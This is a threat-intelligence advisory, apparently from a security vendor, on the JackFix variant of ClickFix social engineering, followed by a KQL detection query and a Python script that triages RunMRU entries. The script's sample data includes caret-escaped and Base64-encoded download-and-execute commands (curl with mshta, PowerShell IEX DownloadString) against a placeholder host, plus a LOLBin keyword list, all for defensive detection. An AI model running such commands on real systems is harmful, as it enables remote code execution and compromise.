JackFix Attack Targets Windows and macOS: Advanced Social Engineering Bypasses ClickFix Security Controls
- Rescana
- 18 hours ago
- 4 min read

Executive Summary
The emergence of the JackFix attack marks a critical escalation in the ongoing evolution of social engineering and malware delivery tactics. JackFix is a sophisticated variant of the well-documented ClickFix technique, engineered specifically to circumvent both technical and human-centric mitigations that have been deployed in response to earlier campaigns. By leveraging advanced obfuscation, multi-stage payload delivery, and cross-platform compatibility, JackFix enables threat actors to bypass browser warnings, endpoint detection, and user awareness training. The attack chain culminates in the delivery of high-impact malware families, including infostealers, remote access trojans (RATs), and rootkits, with observed payloads such as Lumma Stealer, Latrodectus, NetSupport RAT, and Atomic macOS Stealer (AMOS). This advisory provides a comprehensive technical analysis of the JackFix attack, its tactics, techniques, and procedures (TTPs), exploitation in the wild, victimology, and actionable mitigation strategies.
Threat Actor Profile
The JackFix attack has been attributed to a constellation of financially motivated and advanced persistent threat (APT) groups, including but not limited to Storm-1607, Storm-0426, Storm-0249, and the OBSCURE#BAT cluster. These actors have demonstrated a high degree of operational agility, rapidly iterating on social engineering lures and technical delivery mechanisms. Storm-1607 is known for deploying DarkGate malware in North America, while Storm-0426 and Storm-0249 have been linked to MintsLoader and Latrodectus loader campaigns in Europe. The OBSCURE#BAT group specializes in deploying stealthy rootkits via Discord-themed lures. These actors leverage a global infrastructure of compromised domains, malvertising networks, and phishing kits, enabling them to target a diverse set of sectors and geographies with high precision.
Technical Analysis of Malware/TTPs
The JackFix attack chain is a multi-stage process that exploits both human and technical vulnerabilities. The initial access vector typically involves phishing emails, malvertising, or compromised websites that redirect users to a JackFix landing page. These pages are meticulously crafted to impersonate trusted brands such as Microsoft, Social Security Administration, Discord, and Spectrum. The lure often takes the form of a fake verification prompt, such as a Cloudflare Turnstile, Google reCAPTCHA, or a Discord invite.
Upon user interaction, malicious JavaScript code leverages the navigator.clipboard.writeText() API to copy a pre-crafted command to the user's clipboard. The user is then instructed to paste this command into the Windows Run dialog, PowerShell, or macOS Terminal. The command is heavily obfuscated, employing techniques such as Base64 encoding, string concatenation, and escape characters to evade static analysis and signature-based detection.
Execution of the command initiates a fileless, multi-stage payload delivery process. On Windows, the attack chain frequently abuses living-off-the-land binaries (LOLBins) such as powershell.exe, mshta.exe, and rundll32.exe to download and execute additional payloads. These payloads include infostealers (Lumma Stealer, Lampion), RATs (NetSupport, Xworm), loaders (Latrodectus, MintsLoader), and rootkits (r77). On macOS, the attack leverages Bash scripts that prompt the user for their password, enabling the installation of AMOS and other macOS-specific malware.
Persistence is achieved through registry autorun keys and scheduled tasks, while evasion is facilitated by anti-VM checks, multi-stage scripting, and masquerading techniques. The RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) plays a different role: it is not a persistence mechanism. Windows records every command executed from the Run dialog there, so the pasted command survives as a forensic artifact even after the fileless stages have finished, which is why it features in the detection guidance below. The attack chain is designed to be highly modular, allowing threat actors to swap payloads and delivery mechanisms with minimal effort.
Exploitation in the Wild
JackFix has been observed in a series of high-profile campaigns targeting multiple sectors and regions. In May and June 2025, the Lampion campaign targeted government, finance, and transportation entities in Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico. Attackers used phishing emails with ZIP or HTML attachments that led to JackFix lures and multi-stage VBScript payloads.
In June 2025, a campaign impersonating the US Social Security Administration used Google Ads redirects and a spoofed SSA website to deliver ScreenConnect via the JackFix technique. Malvertising campaigns in April 2025 redirected users from streaming sites to JackFix pages, delivering Lumma Stealer through scripts disguised as media files with extensions such as .mp3, .mp4, and .ogg.
On macOS, a campaign in May and June 2025 used Spectrum-themed lures to deliver AMOS, prompting users for their password and bypassing native macOS security controls. These campaigns demonstrate the adaptability of JackFix and its ability to exploit both technical and human vulnerabilities across platforms.
Victimology and Targeting
The JackFix attack has been deployed against a broad spectrum of sectors, including government, finance, transportation, and education. Geographically, confirmed targets include organizations in Portugal, Switzerland, Luxembourg, France, Hungary, Mexico, the United States, Canada, and Germany. The attack is opportunistic but demonstrates a preference for high-value targets with access to sensitive data or financial assets. The use of brand impersonation and localized lures indicates a high degree of reconnaissance and targeting sophistication.
Mitigation and Countermeasures
Mitigating the JackFix attack requires a multi-layered approach that addresses both technical and human factors. User education remains paramount; training should cover this specific lure: no legitimate verification page, CAPTCHA, or support site ever asks a user to open the Run dialog or a terminal and paste a command. Device configuration should be hardened by removing the Run dialog where it is not needed (the Group Policy setting "Remove Run menu from Start Menu" under User Configuration, which also blocks the Win+R shortcut) and by restricting PowerShell and Terminal use for non-administrative users, for example through application control (AppLocker or WDAC) and PowerShell Constrained Language Mode.
Technical controls should include enabling Microsoft Defender SmartScreen and network protection features, deploying endpoint detection and response (EDR) solutions with behavioral analytics capable of detecting LOLBin abuse and obfuscated scripts, and monitoring for suspicious registry entries such as RunMRU. Email filtering and URL rewriting should be configured to block known phishing and malvertising vectors.
Detection can be enhanced using queries such as the following for Microsoft Defender XDR:
```kusto
// explorer.exe writes each command executed from the Run dialog to RunMRU
DeviceRegistryEvents
| where ActionType =~ "RegistryValueSet"
| where InitiatingProcessFileName =~ "explorer.exe"
| where RegistryKey has @"\CurrentVersion\Explorer\RunMRU"
// "^" catches cmd.exe caret-escaping (p^o^w^e^r^s^h^e^l^l), which splits
// keywords so that the plain has_any terms would otherwise miss them
| where RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")
```
Network monitoring should focus on connections to known malicious domains and IP addresses associated with JackFix campaigns. File and process monitoring should flag suspicious executions of PowerShell, mshta, rundll32, or wscript, especially when initiated from explorer.exe or the Run dialog.
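The KQL query above matches on raw RunMRU data, so the obfuscation described in the technical analysis (caret-escaped tokens, Base64 -EncodedCommand) hides the actual command from a keyword match. The following is an added example, not code from the Rescana advisory, of the normalisation a triage script can apply to the same artifact: it orders the entries via MRUList, undoes cmd.exe caret escaping, decodes -EncodedCommand blobs as UTF-16LE (the encoding PowerShell expects before Base64, a common mistake when analysts try a plain UTF-8 decode), and then applies the keyword heuristics. The RunMRU export, the example.invalid URLs and the LOLBin keyword list are constructed assumptions for illustration, not captured campaign data.

```python
import base64
import re

# Constructed RunMRU export (not real campaign data): REG_SZ values a, b, c ...
# hold commands executed from Win+R, each with a trailing "\1" marker, and
# MRUList orders them most-recent-first. example.invalid never resolves.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
    .encode("utf-16-le")           # PowerShell -EncodedCommand is UTF-16LE, not UTF-8
).decode("ascii")

SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd /c c^u^r^l -s http://example.invalid/x.mp3 -o %TEMP%\\x.hta "
         "&& m^s^h^t^a %TEMP%\\x.hta\\1",
    "c": f"powershell -w hidden -ep bypass -enc {ENCODED_SAMPLE}\\1",
}

# Assumed heuristic keyword list, mirroring the has_any list of the KQL query.
LOLBINS = ("powershell", "pwsh", "mshta", "rundll32", "wscript", "cscript",
           "msiexec", "curl", "certutil", "bitsadmin")

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob ("-ep bypass" does not match).
ENC_RE = re.compile(r"(?<![\w-])-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def unescape_cmd_carets(command: str) -> str:
    """Undo cmd.exe caret escaping: ^x -> x and ^^ -> ^."""
    out, i = [], 0
    while i < len(command):
        if command[i] == "^" and i + 1 < len(command):
            out.append(command[i + 1])
            i += 2
        else:
            out.append(command[i])
            i += 1
    return "".join(out)


def decode_encoded_command(command: str):
    """Return the plaintext of a PowerShell -EncodedCommand blob, or None."""
    m = ENC_RE.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None                # not valid Base64 / not UTF-16LE: leave for manual review


def parse_runmru(values: dict) -> list:
    """Return Run-dialog commands most-recent-first with the trailing "\\1" removed."""
    cmds = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds


def triage(command: str) -> dict:
    """Normalise one command and report why it looks like a ClickFix-style paste."""
    normalized = unescape_cmd_carets(command)
    decoded = decode_encoded_command(normalized)
    haystack = (normalized + " " + (decoded or "")).lower()
    hits = [b for b in LOLBINS if b in haystack]
    reasons = []
    if "^" in command:
        reasons.append("caret-escaped tokens")
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    if re.search(r"-(?:ep|ex[a-z]*)\s+bypass", haystack):
        reasons.append("execution policy bypass")
    if hits:
        reasons.append("LOLBin: " + ", ".join(hits))
    if re.search(r"https?://|\\\\", haystack):
        reasons.append("remote fetch")
    return {"command": command, "normalized": normalized, "decoded": decoded,
            "hits": hits, "reasons": reasons, "suspicious": bool(reasons)}


def hunt(values: dict) -> list:
    """Triage a RunMRU export and return only the suspicious findings."""
    return [f for f in (triage(c) for c in parse_runmru(values)) if f["suspicious"]]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_RUNMRU):
        print(finding["command"])
        print("   normalized:", finding["normalized"])
        if finding["decoded"]:
            print("   decoded:   ", finding["decoded"])
        print("   reasons:   ", "; ".join(finding["reasons"]))
```

On a live host the same logic applies to the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`; the two sample entries that this script flags are exactly the ones a raw keyword match would miss (`c^u^r^l` is not `curl`, and the Base64 blob contains neither `DownloadString` nor `http`).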
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their digital supply chain. Our platform leverages advanced threat intelligence, automation, and continuous monitoring to empower security teams with actionable insights and proactive defense strategies. For more information about how Rescana can help your organization strengthen its cyber resilience, we are happy to answer questions at ops@rescana.com.